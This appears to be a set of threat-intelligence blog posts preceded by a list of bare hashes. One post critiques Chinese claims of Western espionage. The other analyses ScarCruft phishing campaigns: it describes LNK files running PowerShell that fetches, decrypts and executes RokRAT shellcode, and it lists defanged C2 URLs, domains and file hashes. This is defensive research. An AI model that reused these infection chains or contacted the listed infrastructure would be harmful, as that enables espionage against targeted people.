2e9bb5c725eee402a36d64f63e07f72451eaec03
319569a20fdaf2fa356f6e33e575a5a613da79b2
32a21398869e2e221552da49fe1d4beba11ad2ca
342d6e453f6a02c43ca4dee045f89cbdaa97926c
357df6a8740bca2b81b62a3a429b2fef5cc883a8
38fcec4299789a1ba16099df0842aa196c34dde6
3b15bf62091a80ec32a2c3af92da5115641cf13b
3ba42572bd49882280306fc72759016c1ea90e7c
3c6dfef72f703bd8a2779a40cef39c4eb2305e69
3d920ba992668bbb303a6680251c54c928fec988
3f31c8c8bf2acdbb3cbe792b2728b3a2eadccaec
3fc724ee8958f941168e16e06ed8f0eccffacde7
403ed75a0a86783a39e65aac0ca8d69d43f7a562
40840c0b6bd9a6a25dd864e7812cb1ee499b10bf
45a39f3af4ca67dea1f920a7bd03fe43b4b38bec
492a0031807ea7defcfb6a0be058580adac88345
4aa1f81a313c991532379f68808a59fdbecef2de
4c95a04759f5edc679122c013d2bb2570cef78dc
4cdbc5d865172d4026a624f0aa56959875ba562c
4d8bcefef73e03784fd104b8cec8bb2e3b47c89b
4f636146bc6661795a4fbde68c5ca5b48e4a462d
508d218b811aaea176b51f577a2cb74ff59ddf6e
50e6703a85b4e72834cef4438f29777c0e73af54
533ba3e5bacf6c982cc827b6aef62817897cf8ea
53c26c8f577e45ba188e18b89da4b54ff41970d0
563bc88fd217b1af0301e7eec2b03051a7236054
56d51c8d5959d33ba4c52643a6436380e4f9fd8b
589a185002c75260b66a29a21939a751d1b49585
5a61394c2b1b0da534a348ecd714810a57194574
5a6f197b77317d5d80dbe59984ccffa11cbc28ac
5aae678fdaada1e58e88fe9a8eabfddfc1fafed1
5bc0e77c722c8b973e8d2627002da3503e26dbde
5dc5dc2206059359df9bc5056dca634b8ca13004
5fe779032a8edf0866832903aac4caa4c22d65cc
60077d66f395c7af28537338bd8fed0e5f108617
601c2e36a2f284ef3bb4752b364da53afe480537
60d209585249f32d0ad24ca295911729d8f56496
64a8d7093ed1f3737901110118c768fb9ded4882
64cb6b72523df13628d2f43f400c719a556c5d86
658a6fe9f5700426d2a6b85dc035ba54b847eede
6594a9357d39e377032fc2b5094ee2f68248bffe
687f843a50e75ea74b8c51487356ee2b1ebfe359
6911cb39a03184324406f79042b648b8ed89c2d9
6c1eefaba836d8a4f86ab8cc7d9a514f045827bb
6cd850c489930ef8d2438174ab38d4c33bc70c45
6d0e9ce56f99c87d9d70e0522b96c625783aece2
7935a5760e10976d9eff013735c303069c669e72
797acd73e43b3f56961d0c687d86009fec832aee
79f93db9c9b5f42c7b26b79c926eb3dfeaee3571
7c53c7119bf6be6c5b149a1fdcb2c22b39bc1470
7c6d96174246fe907a1cb7fbe0f2592c1f8b48b7
7edcdc353071b1c44ce4a8ac33670378a86eb1ba
83e8e7da62463b79970442d2b0de2eccf36450f7
847bb302b6107ac93a669c09552ca158a1440596
87091170ae9ec6e0641d1e689a22e11324e2e4c6
87093850d8084a9a1b1881e0959acf41fcf8799c
87b41c7f499be3b765628874b37d2d0f84d53517
88dfbd8036b122a1efa32b222f985447c7c80b41
8952fbe59931daba401f615bf06b90547b6171a7
8ac6dd99742dd328b690fb6f0552f2c4df2566c6
8bc41965baba7f5e25d4bbb0519c1e4c573734c5
8f06a9204f9a354cdf4dbf4c3ae870d5a386de59
9004df92c9a9427767fdca02b9a1378cff42dbce
91065e8ab12e9fce202c0eac0290cb1bd6c46ae2
912a376b255e3b873a73767679e0fbe9a1b01446
91562cad5eb7a9568190fa4b84da4de50ed3d274
95197a29d05d2043771bc97a5ded6086f6dfbbd2
95e707b5f9257913a36fb276d25e7312a9b86156
97fba04a848da3c09bd906b6b3adb4aa9031e471
98b85e3e2bcff8b5032ddbb9758174dec2bacf58
9954725c56a9060c90b8d5cd0483fc6808f39bd1
99d35595f41a9be3fc077d37599447c096ce66cf
9a2ac6259c2707b34546bee8b5a4eec677716299
9c4593c93cc5a5d7712bee10574823ebca9f6674
9f2faa971f0f4fd783e34d11cba67b261b54cc5c
9f9fbf77fd4c3aeb1542589efdc45d4e328da56c
a19ac9df01a0bc64e636054b0a728e024ade61e9
a2163de2f5056d64a27e96a73f7858b79d47ad06
a38087ce0515cd30fb3580ba12840bc610429649
a7ec178adabbb8eb533a81c658ecce56a9e697da
ab9baecfdf85033e65d59652e666b7328cb0960d
abddb05ed3b75cae4354044bad05e5662cbfbab5
ad0d4cfcc7c35a9a96ad071a4863dbe8f83d87db
adf4765cb74c708496fa39c8c002e32b6f0c1e71
aebdd69f0bbbb8d0d3c231f0fbe1516edc5e0216
b212145149ca3f1c62e991bcf31357ecc8b17851
b2192b99736376f9e5705e81d3b55bce408e17a8
b26d632d14e91634ba01df0b3b18907657025563
b5d8b89c88f32e2c0a9166f48e87f853a497b667
b66c21bb8ef8ffa3143f3a6bae2c67f14eef069a
b6e3c52c1bd309f596b4ba50d0f7487b66bd5701
b7420fb4774e755bdb3062d12eb750687c115a3a
b7a6780990590ac3ebb632b9198b63531d645129
b841b4ae0629a5336356bce88794e0744f72f98b
ba5d94f8852f5cdee14e2bf8e1f0eb1cf599ecfb
bc0e3f1c5b323daf31ecff178c620be0c03efb64
bc3ebc37a77acef15b827e4ee43aeb839bc5605d
be0ca87b74a345d62814cad3916133e3e655acc6
bf9c85e3ed9a3f0a51eeda6284be24b507a5770f
c117393f640ccd1d5fa5b002fcc3803498b61a2d
c283818259bceaddfd62554fdf37493d413b9b84
c547caad7d7517b2026e3c17461c249a925460d3
c60830bac782f58c61a81821da8153f639c86a74
c92c68b12ba817df7eb83666bd478466cb1c423a
cabbe92c9b5acb779f9fb76b1f8e3ed77a44935d
cb27a59e95c5d1b81219ba1cae4225f7340b16f2
cc4306140f14bcec70f103f4213e96e24d065381
ce701e5c639158563455c28bc39efd2051196932
cea7151a8260b9e48b687d40a9062ad361efed2d
cf4872e3e9f580b1865f68bae6b31bca0f0e22e6
cf7f11b4a39792531118058bd1c8ba2a2cabc486
d71c9f3d3aba149d13d7434731423c164cf2f002
d77c1f97339ba891286c10f6456a1e7f44b3c3bb
d78275c82d2f10ba5ed6bfbfec37686a7646d8ea
dc7fd807e8c9fc10185dcc47bc14f7460a4228b3
dd682090d3815b52cf74b22280d1b8db02ef339e
df66269b6826273650716524219dd83cf0302dc4
df7ee28ca069f798489cb4dc2ff1295bb6377a6f
dff37819d805c0fa99f11a466f583f2f752af8b0
e2498ab48872162bab97e7a5737376cec2a5b401
e7dc9e8f82cab9de0ec3b92693cdca726c5d72a6
e95528bd91158bab9d1e998969951209f6d8a3b6
ea4c4495ac7d68543cb423d34704e8fbfd595f6b
eab2f2b4a924397d22ecd1a6e8758de585e9fdcc
ee7105ca1065b6f0f6ce4b041b1a0a95b5678790
eefcbc6b32fdf7167db0b9a455b3c8c0f8d4b58d
ef5a5d04dc048a3c1f6a415be1ad74e1478b802e
ef8b8d215b4cc107495b3957fbedd2317f642cd9
f01c586c97d68847d1f373f7fd45444af26aff7a
f28b3d223a0c351f70ec0c7680e80083c232a470
f351bd5595b1eb2196f5c2ef1c519a7a8a7967dc
f35fd34a90c7a9b827c1d9417b8f088e8302ba01
f3b5e4840139ab0465b3c432d19bae1365e923af
f5b1256e407fb37d44a54ba29dc6fd4815cfde55
f754e4a59c49c0b3e653fdd8fdc04078810524dd
fae99902bef8011459926e4a69b85ae2cf0c0914
fc9d7c59645450be5887f938aaacbca2b0b3f1f9

China’s Cyber Revenge | Why the PRC Fails to Back Its Claims of Western Espionage

12 February 2024 at 11:00

Executive Summary

  • China launched an offensive media strategy to push narratives around US hacking operations following a joint statement by the US, UK, and EU in July 2021 about China’s irresponsible behavior in cyberspace.
  • Some PRC cybersecurity companies now coordinate report publication with government agencies and state media to amplify their impact.
  • Allegations of US hacking operations by China lack crucial technical analysis to validate their claims. Until 2023, these reports recycled old, leaked US intelligence documents. After mid-2023, the PRC dropped pretense of technical validation and only released allegations in state media.
  • The cyber-focused media campaign preceded the 2023 efforts of China’s Ministry of State Security to disclose accounts of western spying in the PRC.

Introduction

In the western media and cybersecurity industry in general, we have become familiar with regular reports of nation-state espionage activities often attributed to China or Chinese-linked threat groups. Such reports rest their credibility on the level of meticulous technical detail and evidence-based claims contained therein.

In contrast, claims of espionage and cyber intrusion attributed to western nation-state agencies emanating out of China’s Ministry of State Security and Chinese cybersecurity firms are notably lacking in the same kind of technical detail or evidential proof.

Between the first reports establishing US involvement in Stuxnet and the summer of 2021, China’s most prominent actors in the cybersecurity industry never independently established attribution of hacking inside the PRC to any US-affiliated APTs, nor did the analysis of US-nexus hacking extend beyond tools and exploits.

China’s cybersecurity companies also never published the underlying technical data that is considered table stakes for non-Chinese companies. The companies only regurgitated information from foreign vendors or leaked US intelligence documents. This was a matter of policy, not capability. Such reports were likely written and held back from external publication since at least 2016.

Below, we describe how and why this strategy came into play. Interested readers can find a more  detailed analysis in the full report.

China's Cyber Revenge

China Pivots to Rehashing Old Quarrels

In the winter of 2021, a PRC hacking team was taking advantage of four vulnerabilities in Microsoft Exchange Servers. When intelligence that Microsoft was planning to patch reached the team, they shared the vulnerability with others and automated their attack for scale.

This significant increase in abuse, in concert with its arbitrary targeting that left victims vulnerable to much easier compromise, pushed the U.S., U.K., and the EU jointly to issue a statement condemning China’s behavior in cyberspace. The joint statement so irked the PRC government that it began a media campaign to push narratives about US hacking operations in global media outlets.

China's Cyber Revenge

Starting in early 2022, state media began releasing English-language articles to accompany CTI publications by PRC cybersecurity companies and government agencies. This marked a shift in China’s approach to discussing foreign espionage, highlighting US hacking activities more frequently to a global audience.

In 2021, Global Times  only mentioned the NSA twice–both in the context of railing against global capitalists. In 2022, the publication mentioned the NSA in connection to hackings tools or operations 24 times.

But the reports released throughout 2022 and into 2023 continued to draw from leaked US government documents, not new technical analysis by PRC companies. They were, in effect, recycling old content for propaganda purposes. The China Cybersecurity Industry Alliance released its Review of Cyberattacks from US Intelligence Agencies in 2023, summarizing over a decade of research on US cyberattacks, albeit without new evidence. Of the nearly 150 citations in the report, less than one-third are attributed to PRC vendors. A full accounting of these publications is available in the full report.

A New Era

In July 2023, China did something it hadn’t done before—it spread new allegations of US hacking apparently unrelated to past US intelligence leaks and, as of this report, entirely unsubstantiated.

In a series of publications by Global Times, the CEO of Antiy claimed the United States had hacked into seismic censors of the Wuhan Earthquake Monitoring Center. His claims, along with those of the Global Times, were ostensibly based on a report from CVERC and Qihoo360. But this report, if it exists, is not yet public. Neither CVERC nor Qihoo360 host such a report on their respective websites, nor does any PRC government agency. Qihoo360’s only mention of the Wuhan Center is a community board post by an anonymous user referencing state media.

The lack of technical details–or in this case, a report at all–did not stop the story from getting attention. A handful of cybersecurity industry outlets in the U.S. picked up the story and ran it in July and August after the Global Times published another report covering the allegations. This time, state media claimed that “Chinese authorities will publicly disclose a highly secretive global reconnaissance system of the US government…” To date, this remains yet another report that has not been released.

The allegations of US hacking without technical evidence coincided with China’s Ministry of State Security launching its public WeChat account. Since the middle of 2023, the MSS has published four accounts of foreign spies operating in China and being caught. Three are alleged to have been working for the U.S., a fourth was alleged to have worked for the UK and was tied to office raids of foreign due diligence firms. Off-the-record American officials confirmed one of the US cases to press later in the year. Further discussion of China’s allegations of human intelligence collection is available in the full report.

Conclusion

China has not yet published detailed accounts that analysts have come to expect from cybersecurity firms. Accepting this asymmetry in data sharing benefits China, allowing the country to publish claims of foreign hacking without the requisite information. If analysts do not actively challenge the CCP’s claims, the government can lie with impunity.

Repeating China’s allegations helps the PRC shape global public opinion of the U.S. China wants to see the world recognize the U.S. as the “empire of hacking.” But outright ignoring China’s claims undermines public knowledge and discourse. The fact that China is lodging allegations of US espionage operations is still notable, providing insight into the relationship between the US and China, even if China does not support its claims. CTI analysts and intelligence consumers would be wise to differentiate between the claims made by China across domains, however.

To date, China has provided no reasonable evidence to support any of its claims besides wantonly recycling leaked US intelligence. In western cybersecurity industry circles, claims of US hacking without supporting technical evidence are derided—and rightfully so.

State secrecy laws are the likely culprit stopping PRC-based cybersecurity companies from publishing technical data. With their hands tied, the CCP’s political mandate to support narratives of western espionage operations leaves its companies hamstrung. We can and should call out this lack of rigor when we see it, ensuring that claims made by Chinese firms and the government are held to the same, rigorous analytical standards the global cybersecurity community has self-imposed.

Read the Full Report

ScarCruft | Attackers Gather Strategic Intelligence and Target Cybersecurity Professionals

Executive Summary

  • SentinelLabs observed a campaign by ScarCruft, a suspected North Korean APT group, targeting media organizations and high-profile experts in North Korean affairs.
  • We recovered malware in the planning and testing phases of Scarcruft’s development cycle, presumably intended for use in future campaigns.
  • ScarCruft has been experimenting with new infection chains, including the use of a technical threat research report as a decoy, likely targeting consumers of threat intelligence like cybersecurity professionals.
  • ScarCruft remains committed to acquiring strategic intelligence and possibly intends to gain insights into non-public cyber threat intelligence and defense strategies.

Overview

In collaboration with NK News, SentinelLabs has been tracking campaigns targeting experts in North Korean affairs from South Korea’s academic sector and a news organization focused on North Korea. We observed persistent targeting of the same individuals over a span of two months. Based on the specific malware, delivery methods, and infrastructure, we assess with high confidence that the campaigns are orchestrated by ScarCruft. Also known as APT37 and InkySquid, ScarCruft is a suspected North Korean advanced persistent threat (APT) group with a long history of targeted attacks against individuals as well as public and private entities, primarily in South Korea.

In addition, we retrieved malware that we assess is currently in the planning and testing phases of ScarCruft’s development cycle and will likely be used in future campaigns. In an interesting twist, ScarCruft is testing malware infection chains that use a technical threat research report on Kimsuky as a decoy document. Kimsuky is another suspected North Korean threat group observed to share operational characteristics with ScarCruft, like infrastructure and C2 server configurations. Given ScarCruft’s practice of using decoy documents relevant to targeted individuals, we suspect that the planned campaigns will likely target consumers of technical threat intelligence reports, like threat researchers, cyber policy organizations, and other cybersecurity professionals.

We observed ScarCruft using oversized Windows Shortcut (LNK) files that initiate multi-stage infection chains delivering RokRAT, a custom-written backdoor associated with the threat group. RokRAT is a fully-featured backdoor equipped with capabilities that enable its operators to conduct effective surveillance on targeted entities. In an attempt to execute undetected, the infection chains involve multiple executable formats and evasion techniques. They continue an existing trend, closely resembling the infection chains seen in ScarCruft activities from earlier in 2023, including the campaigns disclosed by AhnLab in April 2023, Checkpoint in May 2023, and Qi An Xin in July 2023.

By targeting high-profile experts in North Korean affairs and news organizations focused on North Korea, ScarCruft continues to fulfill its primary objective of gathering strategic intelligence. This enables the adversary to gain a better understanding of how the international community perceives developments in North Korea, thereby contributing to North Korea’s decision-making processes.

ScarCruft’s focus on consumers of technical threat intelligence reports suggests an intent to gain insights into non-public cyber threat intelligence and defense strategies. This helps in identifying potential threats to their operations and contributes to refining their operational and evasive approaches. As we continue to track suspected North Korean threat actors and their pace of experimentation, we assess they have a growing interest in mimicking cybersecurity professionals and businesses, ultimately for use in the targeting of specific customers and contacts directly, or more broadly through brand impersonation.

ScarCruft Campaigns

A phishing email, impersonating a member of the North Korea Research Institute (Institute for North Korean Studies  – INKS), was sent from the email address kirnchi122[@]hanmail.net on December 13, 2023, targeting an expert in North Korean affairs. The email contains an attached archive file named December 13th announcement.zip (machine translation from Korean), which includes nine files.

The files claim to be presentation materials from a fabricated event relevant to the targeted individual — an apparent human rights expert discussion meeting. To make the phishing email current and therefore more credible, the email asserts that the meeting occurred on the same date the email was sent (December 13).

ScarCruft Phishing email (in Korean)
Phishing email (in Korean)

Among the nine files, seven are benign Hangul Word Processor (HWP) and PowerPoint documents, while two are malicious LNK files. LNK files have become popular among threat actors for malware deployment since Microsoft’s announcement that Office applications will by default disable the execution of Office macros in the context of documents that originate from untrusted sources.

In an attempt to make the malicious LNK files blend among the benign files, all files have names that relate to human rights in North Korea and start with a number assigned to each file. Furthermore, the LNK files disguise themselves as Hanword documents, using the Hangul Word Processor icon (the Icon location LNK artifact was set to C:\Program Files (x86)\Hnc\Office 2018\HOffice100\Bin\Hwp.exe).

Filename Machine translation
1. 전영선 북한 주민 정보접근권 강화방안.hwp 1. Jeon Young-seon’s plan to strengthen North Korean residents’ right to access information.hwp
2.이상용 반동사상문화배격법과 정보 유입 활동의 변화.pptx 2. Lee Sang-yong’s reactionary ideology cultural rejection law and changes in information inflow activities.pptx
3. 이윤식 북한인권법 실행방안 북한인권재단 출범 중심.lnk 3. Lee Yun-sik’s North Korean Human Rights Act implementation plan centered on the launch of the North Korean Human Rights Foundation.lnk
5. 여현철 북한주민 정보접근권 강화 방안.hwp 5. Yeo Hyeon-cheol’s plan to strengthen North Korean residents’ right to access information.hwp
6. 이종겸 북한인권 토론회 토론문.hwp 6. Lee Jong-gyeom North Korean human rights debate discussion paper.hwp
7. 박유성 북한주민 정보접근 강화방안.hwp 7. Park Yoo-sung’s plan to strengthen North Korean residents’ access to information.hwp
8. 이도건 북한연구소 토론회.lnk 8. Lee Do-gun North Korean Research Center Discussion.lnk
9. 김태원 북한인권 전문가 토론회 토론문.hwp 9. Taewon Kim, North Korean human rights expert discussion paper.hwp
10. 서유석 북한 주민들의 알권리 제고 방안.hwp 10. Seo Yoo-seok’s plan to improve North Korean residents’ right to know.hwp

The LNK files exceed 48 MB and implement a multi-stage mechanism deploying the RokRAT backdoor.

ScarCruft Infection chain: 8. 이도건 북한연구소 토론회.lnk
Infection chain: 8. 이도건 북한연구소 토론회.lnk

The LNK files execute PowerShell code that performs the following actions:

  • Locates the executing LNK file based on its filesize.
  • Extracts from the LNK file a decoy document (in HWP and HWPX format), a Windows Batch script named 111223.bat, and a PowerShell script named public.dat, placing the script in the %Public% folder.
  • Displays the decoy document and executes 111223.bat.
  • Deletes the executing Shortcut file.

The PowerShell code locates the content of the files it extracts from the LNK file based on hardcoded offsets.

ScarCruft PowerShell code
PowerShell code

111223.bat then executes the PowerShell script stored in %Public%\public.dat. This script decodes and executes another hex-encoded PowerShell script embedded in public.dat.

The content of public.dat
The content of public.dat

The decoded script downloads from a major Cloud file hosting provider a file named myprofile[.]zip, XOR-decrypts the file using the first byte as an XOR key, and executes the decrypted content in a thread.

myprofile[.]zip implements a shellcode that deploys the RokRAT backdoor. RokRAT uses public Cloud services for command-and-control purposes, such as pCloud and Yandex Cloud, disguising malicious communication as legitimate network traffic.

ScarCruft PowerShell script executing shellcode
PowerShell script executing shellcode

While most of the documents we analyzed are stripped of metadata, a HWPX decoy document stands out by containing metadata that identifies the pseudonym bandi as the document’s creator. We note the use of the same string in the context of Kimsuky activities, for example, in an email address used in a phishing campaign (bandi00413[@]daum.net) and in a C2 server domain (one.bandi[.]tokyo).

While the overlap in pseudonym use does not represent a strong link between the groups from a technical perspective, it is still indicative of the suspected relations between them. In the context of North Korea, the term bandi is known as the pseudonym of a suspected North Korean author known for publishing dissident writing. bandi also means ‘firefly’ in Korean.

The bandi pseudonym (HWPX document metadata)
The bandi pseudonym (HWPX document metadata)

Earlier Overlapping Campaign

Some of the individuals targeted in the December 2023 ScarCruft activity, discussed above, were also targeted approximately one month earlier on November 16, 2023. This speaks of the adversary’s persistence and adaptability in pursuing its goals. The November campaign included individuals from a news organization focused on North Korea as well.

A phishing email, impersonating a member of the North Korea Research Institute, was sent from the address c039911[@]daum.net. The email attaches two malicious HWP files, titled 조선 시장 물가 분석(회령).hwp (Shipbuilding market price analysis (Hoeryeong).hwp) and 조선 시장 물가 분석(신의주).hwp (Shipbuilding market price analysis (Sinuiju).hwp, machine translation from Korean), disguised as North Korean market price analysis data.

Phishing email (in Korean)
Phishing email (in Korean)

The documents contain OLE objects, activated by double-clicking on the document’s content. In adherence to the HWP document format, the OLE objects are stored as compressed Structured Storage objects, and their decompression reveals C2 URLs accessed upon OLE object activation.

The HWP documents contain metadata, including the LinkValue, Last Saved By, and Author metadata values, which provide information on the system accounts where the documents have been created.

HWP document C2 URL and metadata
조선 시장 물가 분석(회령).hwp http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=5JV0FAGA6KW1GBHB7LX2HCIC
LinkValue: \Users\Moo\AppData\Local\Temp
Last Saved By: Moo
Author: Moo
조선 시장 물가 분석(신의주).hwp http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=GV6BQLRKHW7CRMSLIX8DSNTM
LinkValue: \Users\DailyN~1\AppData\Local\Temp
Last Saved By: dailynk_001
Author: dailynk01

The DailyN~1/dailynk_001/dailynk01 account is particularly interesting since it relates to Daily NK, a prominent South Korean online news outlet that provides independent reporting on North Korea with which we have collaborated in the past. The focus of this organization makes them an attractive target for North Korean threat actors seeking to intrude or impersonate it, a strategy previously observed by SentinelLabs in past Kimsuky campaigns. It remains to be investigated whether this account is used for developing malware involved in Daily NK-related campaigns and/or serves as an additional indicator of the suspected relations between Kimsuky and ScarCruft. Additionally, in our previous reporting on the overlap of suspected North Korean intrusions into a Russian missile engineering organization, we shared links to ScarCruft infrastructure making use of this same illicit naming scheme, such as dallynk[.]com.

Pivoting on the DailyN~1 artifact revealed additional HWP documents that share overlapping metadata information and employ the same OLE-based infection vector, using different C2 URLs.

HWP document (SHA-1 hash) C2 URL and metadata
e9df1f28cfbc831b89a404816a0242ead5bb142c http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=IV3D9YMNJW4EAZNOKX5FB0OP
LinkValue: \Users\DailyN~1\AppData\Local\Temp
Last Saved By: dailynk01
Author: umgdnk-03
2f78abc001534e28eb208a73245ce5389c40ddbe http[://]app[.]documentoffice[.]club/voltage_group_intels?user=HE16AJHVFCZ48HFTGD059IGU
LinkValue: \Users\DailyN~1\AppData\Local\Temp
Last Saved By: dailynk_001
Author: /

The app.documentoffice[.]club domain is also used as C2 endpoint for malicious Microsoft Office documents, employing ActiveX controls to establish communication with the C2 server.

Office document (SHA-1 hash) C2 URL
e46907cfaf96d2fde8da8a0281e4e16958a968ed http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=8B86CA616964A84Y7A75B950
39c97ca820f31e7903ccb190fee02035ffdb37b9 http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=H11I75PFF0ZG53NDG00H64OE
577c3a0ac66ff71d9541d983e37530500cb9f2a5 http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=MZ9IUNQ7KX7GSLO5LY8HTMP6

At the time of analysis, the C2 URLs were inactive, preventing us from examining their functions and any potential additional payloads they might deliver to the targets. We are still investigating the role of the user and view query parameter values, such as 5JV0FAGA6KW1GBHB7LX2HCIC and H11I75PFF0ZG53NDG00H64OE.

While preparing this report, Genians released research that outlines ScarCruft campaigns throughout 2023, covering certain aspects of the activities discussed in this section. We add to the public information on this activity cluster by providing additional details on the related infrastructure.

Infrastructure associated with this cluster of suspected North Korean threat activity leads to multiple interesting details which we have found useful for further monitoring and analysis of separate campaigns. The domains offlinedocument[.]site and documentoffice[.]club both make use of a variety of subdomains such as open, nav, and app as previously mentioned. During their illicit use, the domains temporarily make use of Lithuania’s Cherry Servers virtual private server (VPS) hosting service – 84.32.131[.]87, and 84.32.131[.]104 in this case.

A repeating trend is the actor registering domains through Namecheap, leaving the domain parked on a Namecheap IP address, and then rotating to Cherry Servers. In separate domains, we observe this same operational workflow, and interestingly other domains which the actor only makes use of for one or two days before shifting back to a parked IP address. We assess this process aims to limit detection and analysis capabilities following their malicious activity, such as hosting a phishing login or malware delivery link.

Examples of this activity can be found through publicly available telemetry, such as that of instantreceive[.]org. This domain hosted a page mimicking GitHub, a characteristic not new to North Korea-attributed threat actors, as we have reported on in the past.

GitHub phishing page
GitHub phishing page

This domain overlaps through the use of unique Cherry Servers hosting IPs, which can be used for further moderate-confidence infrastructure pivoting. We encourage readers to conduct additional research and monitoring. The full list shown here is provided in the IOC table.

ScarCruft Cherry Servers overlap map
Cherry Servers overlap map

ScarCruft Testing Grounds

While investigating ScarCruft activities, we retrieved malware that we assess to be part of ScarCruft’s planning and testing processes. This includes a spectrum of shellcode variants delivering RokRAT, public tooling, and two oversized LNK files, named inteligence.lnk and news.lnk.

Although similar to those implemented by 3. 이윤식 북한인권법 실행방안 북한인권재단 출범 중심.lnk and 8. 이도건 북한연구소 토론회.lnk discussed above, the infection chains  executed by inteligence.lnk and news.lnk exhibit some differences. This has likely been done to evade detection based on the known ScarCruft techniques that have been publicly disclosed by the threat intelligence community.

Infection chain: news.lnk
Infection chain: news.lnk

inteligence.lnk executes PowerShell code, which locates the executing LNK file based on its filename instead of its filesize. The code then extracts from the LNK file and displays a decoy PDF document (named inteligence.pdf), and downloads from a major Cloud file hosting provider a hex-encoded file named story.txt. The PowerShell code locates the content of the decoy document it extracts from the LNK file based on a byte pattern (50 4b 03 04) instead of a hardcoded file offset.

The PowerShell code then decodes the file, and executes the decoded file content in a thread. story.txt implements a benign shellcode that just opens notepad.exe, indicating that inteligence.lnk has been developed for testing purposes.

In contrast to 3. 이윤식 북한인권법 실행방안 북한인권재단 출범 중심.lnk and 8. 이도건 북한연구소 토론회.lnkinteligence.lnk does not execute a Windows Batch script and an external PowerShell script.

inteligence.lnk: Extraction and display of a decoy document
inteligence.lnk: Extraction and display of a decoy document
inteligence.lnk: Shellcode decoding and execution
inteligence.lnk: Shellcode decoding and execution
inteligence.lnk: Shellcode
inteligence.lnk: Shellcode

news.lnk downloads, in the form of a file named story3.txt, and executes PowerShell code. The implementation and functionality of the code are very similar to that executed by inteligence.lnk, with a major difference being that the shellcode it executes is not downloaded from a remote endpoint but is embedded in the LNK file itself.

In contrast to inteligence.lnk, the shellcode executed by news.lnk is weaponized and deploys the RokRAT backdoor. It is likely that news.lnk is the fully developed version of inteligence.lnk, intended for use in future ScarCruft campaigns. As of the time of writing, we have not observed news.lnk or its variants in the wild.

Both LNK files deploy the same decoy document – a public research report on the Kimsuky threat group by Genians, a South Korean cybersecurity company. The report is written in Korean and was released in late October 2023.

ScarCruft Decoy document
Decoy document

Given the report’s technical content, the LNK file names, and ScarCruft’s use of decoys relevant to the targeted individuals, we suspect ScarCruft has been planning phishing or social engineering campaigns on recent developments in the North Korean cyber threat landscape, targeting audiences consuming threat intelligence reports.

Conclusions

The findings outlined in this post highlight ScarCruft’s ongoing dedication to gathering strategic intelligence through targeted attacks. Our insight into ScarCruft’s malware testing activities reveals the adversary’s commitment to innovating its arsenal and expanding its target list, likely intending to target and/or masquerade as cybersecurity professionals or businesses.

We observed the group experimenting with new infection chains inspired by those they have used in the past. This involves modifying malicious code implementations and excluding certain files from the infection steps, likely as a strategy to evade detection based on filesystem artifacts and the known ScarCruft techniques that have been publicly disclosed by the threat intelligence community.

We suspect that ScarCruft is pursuing non-public cyber threat intelligence and defense strategies. This could benefit not only ScarCruft specifically but also the other constituent groups within the North Korean threat landscape, aiding them in identifying threats to their operations and improving their operational playbooks.

A heightened awareness and better understanding of the adversary’s attack and infection methods among potential targets are crucial for effective defense. SentinelLabs remains actively engaged in tracking ScarCruft activities and supporting the organizations and individuals at risk of being targeted.

Indicators of Compromise

SHA-1 Hashes

Value Note
0ED884A3FC5C28CDB8562CD28993B30991681B0A intelligence.lnk
2F78ABC001534E28EB208A73245CE5389C40DDBE Malicious HWP document
39C97CA820F31E7903CCB190FEE02035FFDB37B9 Malicious Office document
4024A9B0C0F19A33A3C557C7E220B812EE6FDD17 8. 이도건 북한연구소 토론회.lnk
46C3F9DE79D85165E3749824804235ACA818BA09 9. 김태원 북한인권 전문가 토론회 토론문.hwp
483B84F973528B23E5C14BC95FBC7031A4B291F1 1. 전영선 북한 주민 정보접근권 강화방안.hwp
4C74E227190634A6125B2703B05CB16AD69AC051 2.이상용 반동사상문화배격법과 정보 유입 활동의 변화.pptx
577C3A0AC66FF71D9541D983E37530500CB9F2A5 Malicious Office document
7C4E37E0A733B5E8F0F723CCA2A9675901527DC4 Decoy document
88DB1E2EFBB888A97A530C8BEF8CA104CEAAB80C public.dat
8951F3EB2845C0060E2697B7F6B25ABE8ADE8737 3. 이윤식 북한인권법 실행방안 북한인권재단 출범 중심.lnk
9DD8AA1D66CC4E765E63DC5121216D95E62A0E1C 10. 서유석 북한 주민들의 알권리 제고 방안.hwp
9E0C6A067AAB113E6A4B68299AB3B9D4C36FC330 news.lnk
9EAAAB9D4F65E3738BB31CDF71462E614FFBD2BA 6. 이종겸 북한인권 토론회 토론문.hwp
B23A3738B6174F62E4696080F2D8A5F258799CE5 조선 시장 물가 분석(회령).hwp
B91B318A9FBB153409A846BF173E9D1BD0CC4DBF 111223.bat
C4B58CA12F7B16B6D39CE4222A5A2E054CD77B4E 7. 박유성 북한주민 정보접근 강화방안.hwp
D457D6BDCFA6D31934FB1E277FA0DE7119E9C2A5 5. 여현철 북한주민 정보접근권 강화 방안.hwp
D9AC0CC6D7BDC24F52878D3D5AC07696940062D0 myprofile[.]zip
E46907CFAF96D2FDE8DA8A0281E4E16958A968ED Malicious Office document
E9DF1F28CFBC831B89A404816A0242EAD5BB142C Malicious HWP document
FBF4D8C7418B021305317A185B1B3534A2E25CC8 조선 시장 물가 분석(신의주).hwp

Domains

Value Note
app[.]documentoffice[.]club C2 domain (HWP and Office documents)
benefitinfo[.]live VPS overlap (moderate confidence)
benefitinfo[.]pro VPS overlap (moderate confidence)
benefiturl[.]pro VPS overlap (moderate confidence)
careagency[.]online VPS overlap (moderate confidence)
cra-receivenow[.]online VPS overlap (moderate confidence)
crareceive[.]site VPS overlap (moderate confidence)
depositurl[.]co VPS overlap (moderate confidence)
depositurl[.]lat VPS overlap (moderate confidence)
direct.traderfree[.]online VPS overlap (moderate confidence)
forex.traderfree[.]online VPS overlap (moderate confidence)
groceryrebate[.]online VPS overlap (moderate confidence)
groceryrebate[.]site VPS overlap (moderate confidence)
gstcreceive[.]online VPS overlap (moderate confidence)
instantreceive[.]org VPS overlap (moderate confidence)
nav[.]offlinedocument[.]site C2 domain (HWP documents)
receive[.]bio VPS overlap (moderate confidence)
receiveinstant[.]online VPS overlap (moderate confidence)
rentsubsidy[.]help VPS overlap (moderate confidence)
rentsubsidy[.]online VPS overlap (moderate confidence)
tinyurlinstant[.]co VPS overlap (moderate confidence)
urldepost[.]co VPS overlap (moderate confidence)
